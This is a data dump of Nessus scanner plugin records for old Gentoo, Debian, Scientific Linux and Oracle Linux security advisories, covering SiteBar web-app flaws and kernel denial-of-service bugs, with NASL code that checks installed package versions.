{"nessus": [{"lastseen": "2019-01-16T20:07:43", "bulletinFamily": "scanner", "description": "The remote host is affected by the vulnerability described in GLSA-200711-05\n(SiteBar: Multiple issues)\n\n Tim Brown discovered these multiple issues: the translation module does\n not properly sanitize the value to the 'dir' parameter (CVE-2007-5491,\n CVE-2007-5694); the translation module also does not sanitize the\n values of the 'edit' and 'value' parameters which it passes to eval()\n and include() (CVE-2007-5492, CVE-2007-5693); the log-in command does\n not validate the URL to redirect users to after logging in\n (CVE-2007-5695); SiteBar also contains several cross-site scripting\n vulnerabilities (CVE-2007-5692).\nImpact :\n\n An authenticated attacker in the 'Translators' or 'Admins' group could\n execute arbitrary code, read arbitrary files and possibly change their\n permissions with the privileges of the user running the web server by\n passing a specially crafted parameter string to the 'translator.php'\n file. An unauthenticated attacker could entice a user to browse a\n specially crafted URL, allowing for the execution of script code in the\n context of the user's browser, for the theft of browser credentials or\n for a redirection to an arbitrary website after login.\nWorkaround :\n\n There is no known workaround at this time.", "modified": "2018-08-10T00:00:00", "published": "2007-11-07T00:00:00", "id": "GENTOO_GLSA-200711-05.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=27816", "title": "GLSA-200711-05 : SiteBar: Multiple issues", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200711-05.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(27816);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2018/08/10 18:07:07\");\n\n script_cve_id(\"CVE-2007-5491\", \"CVE-2007-5492\", \"CVE-2007-5692\", \"CVE-2007-5693\", \"CVE-2007-5694\", \"CVE-2007-5695\");\n script_xref(name:\"GLSA\", value:\"200711-05\");\n\n script_name(english:\"GLSA-200711-05 : SiteBar: Multiple issues\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200711-05\n(SiteBar: Multiple issues)\n\n Tim Brown discovered these multiple issues: the translation module does\n not properly sanitize the value to the 'dir' parameter (CVE-2007-5491,\n CVE-2007-5694); the translation module also does not sanitize the\n values of the 'edit' and 'value' parameters which it passes to eval()\n and include() (CVE-2007-5492, CVE-2007-5693); the log-in command does\n not validate the URL to redirect users to after logging in\n (CVE-2007-5695); SiteBar also contains several cross-site scripting\n vulnerabilities (CVE-2007-5692).\n \nImpact :\n\n An authenticated attacker in the 'Translators' or 'Admins' group could\n execute arbitrary code, read arbitrary files and possibly change their\n permissions with the privileges of the user running the web server by\n passing a specially crafted parameter string to the 'translator.php'\n file. An unauthenticated attacker could entice a user to browse a\n specially crafted URL, allowing for the execution of script code in the\n context of the user's browser, for the theft of browser credentials or\n for a redirection to an arbitrary website after login.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200711-05\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All SiteBar users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-apps/sitebar-3.3.9'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_cwe_id(22, 59, 79, 94);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:sitebar\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/11/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/11/07\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/06/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-apps/sitebar\", unaffected:make_list(\"ge 3.3.9\"), vulnerable:make_list(\"lt 3.3.9\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"SiteBar\");\n}\n", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:07:53", "bulletinFamily": "scanner", "description": "Several remote vulnerabilities have been discovered in sitebar, a\nweb-based bookmark manager written in PHP. The Common Vulnerabilities\nand Exposures project identifies the following problems :\n\n - CVE-2007-5491\n A directory traversal vulnerability in the translation\n module allows remote authenticated users to chmod\n arbitrary files to 0777 via '..' sequences in the 'lang'\n parameter.\n\n - CVE-2007-5492\n A static code injection vulnerability in the translation\n module allows a remote authenticated user to execute\n arbitrary PHP code via the 'value' parameter.\n\n - CVE-2007-5693\n An eval injection vulnerability in the translation\n module allows remote authenticated users to execute\n arbitrary PHP code via the'edit' parameter in an 'upd\n cmd' action.\n\n - CVE-2007-5694\n A path traversal vulnerability in the translation module\n allows remote authenticated users to read arbitrary\n files via an absolute path in the 'dir' parameter.\n\n - CVE-2007-5695\n An error in command.php allows remote attackers to\n redirect users to arbitrary websites via the 'forward'\n parameter in a 'Log In' action.\n\n - CVE-2007-5692\n Multiple cross site scripting flaws allow remote\n attackers to inject arbitrary script or HTML fragments\n into several scripts.", "modified": "2018-11-10T00:00:00", "published": "2007-12-11T00:00:00", "id": "DEBIAN_DSA-1423.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=29258", "title": "Debian DSA-1423-1 : sitebar - several vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1423. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(29258);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2018/11/10 11:49:33\");\n\n script_cve_id(\"CVE-2007-5491\", \"CVE-2007-5492\", \"CVE-2007-5692\", \"CVE-2007-5693\", \"CVE-2007-5694\", \"CVE-2007-5695\");\n script_xref(name:\"DSA\", value:\"1423\");\n\n script_name(english:\"Debian DSA-1423-1 : sitebar - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several remote vulnerabilities have been discovered in sitebar, a\nweb-based bookmark manager written in PHP. The Common Vulnerabilities\nand Exposures project identifies the following problems :\n\n - CVE-2007-5491\n A directory traversal vulnerability in the translation\n module allows remote authenticated users to chmod\n arbitrary files to 0777 via '..' sequences in the 'lang'\n parameter.\n\n - CVE-2007-5492\n A static code injection vulnerability in the translation\n module allows a remote authenticated user to execute\n arbitrary PHP code via the 'value' parameter.\n\n - CVE-2007-5693\n An eval injection vulnerability in the translation\n module allows remote authenticated users to execute\n arbitrary PHP code via the'edit' parameter in an 'upd\n cmd' action.\n\n - CVE-2007-5694\n A path traversal vulnerability in the translation module\n allows remote authenticated users to read arbitrary\n files via an absolute path in the 'dir' parameter.\n\n - CVE-2007-5695\n An error in command.php allows remote attackers to\n redirect users to arbitrary websites via the 'forward'\n parameter in a 'Log In' action.\n\n - CVE-2007-5692\n Multiple cross site scripting flaws allow remote\n attackers to inject arbitrary script or HTML fragments\n into several scripts.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=447135\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=448690\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=448689\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-5491\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-5492\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-5693\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-5694\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-5695\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-5692\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2007/dsa-1423\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the sitebar package.\n\nFor the old stable distribution (sarge), these problems have been\nfixed in version 3.2.6-7.1sarge1.\n\nFor the stable distribution (etch), these problems have been fixed in\nversion 3.3.8-7etch1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_cwe_id(22, 59, 79, 94);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:sitebar\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:4.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/12/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/12/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.1\", prefix:\"sitebar\", reference:\"3.2.6-7.1sarge1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"sitebar\", reference:\"3.3.8-7etch1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:14:10", "bulletinFamily": "scanner", "description": "A flaw was found in the handling of IEEE 802.11 frames, which affected\nseveral wireless LAN modules. In certain situations, a remote attacker\ncould trigger this flaw by sending a malicious packet over a wireless\nnetwork, causing a denial of service (kernel crash). (CVE-2007-4997,\nImportant)\n\nA memory leak was found in the Red Hat Content Accelerator kernel\npatch. A local user could use this flaw to cause a denial of service\n(memory exhaustion). (CVE-2007-5494, Important)\n\nAdditionally, the following bugs were fixed :\n\n - when running the 'ls -la' command on an NFSv4 mount\n point, incorrect file attributes, and outdated file size\n and timestamp information were returned. As well,\n symbolic links may have been displayed as actual files.\n\n - a bug which caused the cmirror write path to appear\n deadlocked after a successful recovery, which may have\n caused syncing to hang, has been resolved.\n\n - a kernel panic which occurred when manually configuring\n LCS interfaces on the IBM S/390 has been resolved.\n\n - when running a 32-bit binary on a 64-bit system, it was\n possible to mmap page at address 0 without flag\n MAP_FIXED set. This has been resolved in these updated\n packages.\n\n - the Non-Maskable Interrupt (NMI) Watchdog did not\n increment the NMI interrupt counter in\n '/proc/interrupts' on systems running an AMD Opteron\n CPU. This caused systems running NMI Watchdog to restart\n at regular intervals.\n\n - a bug which caused the diskdump utility to run very\n slowly on devices using Fusion MPT has been resolved.", "modified": "2019-01-07T00:00:00", "published": "2012-08-01T00:00:00", "id": "SL_20071219_KERNEL_ON_SL4_X.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=60335", "title": "Scientific Linux Security Update : kernel on SL4.x i386/x86_64", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(60335);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/01/07 9:52:18\");\n\n script_cve_id(\"CVE-2007-4997\", \"CVE-2007-5494\");\n\n script_name(english:\"Scientific Linux Security Update : kernel on SL4.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A flaw was found in the handling of IEEE 802.11 frames, which affected\nseveral wireless LAN modules. In certain situations, a remote attacker\ncould trigger this flaw by sending a malicious packet over a wireless\nnetwork, causing a denial of service (kernel crash). (CVE-2007-4997,\nImportant)\n\nA memory leak was found in the Red Hat Content Accelerator kernel\npatch. A local user could use this flaw to cause a denial of service\n(memory exhaustion). (CVE-2007-5494, Important)\n\nAdditionally, the following bugs were fixed :\n\n - when running the 'ls -la' command on an NFSv4 mount\n point, incorrect file attributes, and outdated file size\n and timestamp information were returned. As well,\n symbolic links may have been displayed as actual files.\n\n - a bug which caused the cmirror write path to appear\n deadlocked after a successful recovery, which may have\n caused syncing to hang, has been resolved.\n\n - a kernel panic which occurred when manually configuring\n LCS interfaces on the IBM S/390 has been resolved.\n\n - when running a 32-bit binary on a 64-bit system, it was\n possible to mmap page at address 0 without flag\n MAP_FIXED set. This has been resolved in these updated\n packages.\n\n - the Non-Maskable Interrupt (NMI) Watchdog did not\n increment the NMI interrupt counter in\n '/proc/interrupts' on systems running an AMD Opteron\n CPU. This caused systems running NMI Watchdog to restart\n at regular intervals.\n\n - a bug which caused the diskdump utility to run very\n slowly on devices using Fusion MPT has been resolved.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind0712&L=scientific-linux-errata&T=0&P=2872\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?84bb9a90\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_cwe_id(189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/12/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL4\", reference:\"kernel-2.6.9-67.0.1.EL\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"kernel-devel-2.6.9-67.0.1.EL\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"kernel-doc-2.6.9-67.0.1.EL\")) flag++;\nif (rpm_check(release:\"SL4\", cpu:\"i386\", reference:\"kernel-hugemem-2.6.9-67.0.1.EL\")) flag++;\nif (rpm_check(release:\"SL4\", cpu:\"i386\", reference:\"kernel-hugemem-devel-2.6.9-67.0.1.EL\")) flag++;\nif (rpm_check(release:\"SL4\", cpu:\"x86_64\", reference:\"kernel-largesmp-2.6.9-67.0.1.EL\")) flag++;\nif (rpm_check(release:\"SL4\", cpu:\"x86_64\", reference:\"kernel-largesmp-devel-2.6.9-67.0.1.EL\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"kernel-smp-2.6.9-67.0.1.EL\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"kernel-smp-devel-2.6.9-67.0.1.EL\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"kernel-xenU-2.6.9-67.0.1.EL\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"kernel-xenU-devel-2.6.9-67.0.1.EL\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:16:27", "bulletinFamily": "scanner", "description": "From Red Hat Security Advisory 2007:1104 :\n\nUpdated kernel packages that fix various security issues and several\nbugs in the Red Hat Enterprise Linux 4 kernel are now available.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThese updated packages fix the following security issues :\n\nA flaw was found in the handling of IEEE 802.11 frames, which affected\nseveral wireless LAN modules. In certain situations, a remote attacker\ncould trigger this flaw by sending a malicious packet over a wireless\nnetwork, causing a denial of service (kernel crash). (CVE-2007-4997,\nImportant)\n\nA memory leak was found in the Red Hat Content Accelerator kernel\npatch. A local user could use this flaw to cause a denial of service\n(memory exhaustion). (CVE-2007-5494, Important)\n\nAdditionally, the following bugs were fixed :\n\n* when running the 'ls -la' command on an NFSv4 mount point, incorrect\nfile attributes, and outdated file size and timestamp information were\nreturned. As well, symbolic links may have been displayed as actual\nfiles.\n\n* a bug which caused the cmirror write path to appear deadlocked after\na successful recovery, which may have caused syncing to hang, has been\nresolved.\n\n* a kernel panic which occurred when manually configuring LCS\ninterfaces on the IBM S/390 has been resolved.\n\n* when running a 32-bit binary on a 64-bit system, it was possible to\nmmap page at address 0 without flag MAP_FIXED set. This has been\nresolved in these updated packages.\n\n* the Non-Maskable Interrupt (NMI) Watchdog did not increment the NMI\ninterrupt counter in '/proc/interrupts' on systems running an AMD\nOpteron CPU. This caused systems running NMI Watchdog to restart at\nregular intervals.\n\n* a bug which caused the diskdump utility to run very slowly on\ndevices using Fusion MPT has been resolved.\n\nAll users are advised to upgrade to these updated packages, which\nresolve these issues.", "modified": "2018-07-18T00:00:00", "published": "2013-07-12T00:00:00", "id": "ORACLELINUX_ELSA-2007-1104.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=67619", "title": "Oracle Linux 4 : kernel (ELSA-2007-1104)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2007:1104 and \n# Oracle Linux Security Advisory ELSA-2007-1104 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(67619);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/07/18 17:43:56\");\n\n script_cve_id(\"CVE-2007-4997\", \"CVE-2007-5494\");\n script_bugtraq_id(26337);\n script_xref(name:\"RHSA\", value:\"2007:1104\");\n\n script_name(english:\"Oracle Linux 4 : kernel (ELSA-2007-1104)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2007:1104 :\n\nUpdated kernel packages that fix various security issues and several\nbugs in the Red Hat Enterprise Linux 4 kernel are now available.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThese updated packages fix the following security issues :\n\nA flaw was found in the handling of IEEE 802.11 frames, which affected\nseveral wireless LAN modules. In certain situations, a remote attacker\ncould trigger this flaw by sending a malicious packet over a wireless\nnetwork, causing a denial of service (kernel crash). (CVE-2007-4997,\nImportant)\n\nA memory leak was found in the Red Hat Content Accelerator kernel\npatch. A local user could use this flaw to cause a denial of service\n(memory exhaustion). (CVE-2007-5494, Important)\n\nAdditionally, the following bugs were fixed :\n\n* when running the 'ls -la' command on an NFSv4 mount point, incorrect\nfile attributes, and outdated file size and timestamp information were\nreturned. As well, symbolic links may have been displayed as actual\nfiles.\n\n* a bug which caused the cmirror write path to appear deadlocked after\na successful recovery, which may have caused syncing to hang, has been\nresolved.\n\n* a kernel panic which occurred when manually configuring LCS\ninterfaces on the IBM S/390 has been resolved.\n\n* when running a 32-bit binary on a 64-bit system, it was possible to\nmmap page at address 0 without flag MAP_FIXED set. This has been\nresolved in these updated packages.\n\n* the Non-Maskable Interrupt (NMI) Watchdog did not increment the NMI\ninterrupt counter in '/proc/interrupts' on systems running an AMD\nOpteron CPU. This caused systems running NMI Watchdog to restart at\nregular intervals.\n\n* a bug which caused the diskdump utility to run very slowly on\ndevices using Fusion MPT has been resolved.\n\nAll users are advised to upgrade to these updated packages, which\nresolve these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2007-December/000460.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-hugemem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-hugemem-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-largesmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-largesmp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-smp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-smp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-xenU\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-xenU-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/12/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 4\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"kernel-2.6.9-67.0.1.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"kernel-2.6.9-67.0.1.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-devel-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"kernel-devel-2.6.9-67.0.1.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-devel-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"kernel-devel-2.6.9-67.0.1.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-doc-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"kernel-doc-2.6.9-67.0.1.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-doc-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"kernel-doc-2.6.9-67.0.1.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-hugemem-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"kernel-hugemem-2.6.9-67.0.1.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-hugemem-devel-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"kernel-hugemem-devel-2.6.9-67.0.1.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-largesmp-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"kernel-largesmp-2.6.9-67.0.1.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-largesmp-devel-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"kernel-largesmp-devel-2.6.9-67.0.1.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-smp-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"i386\", 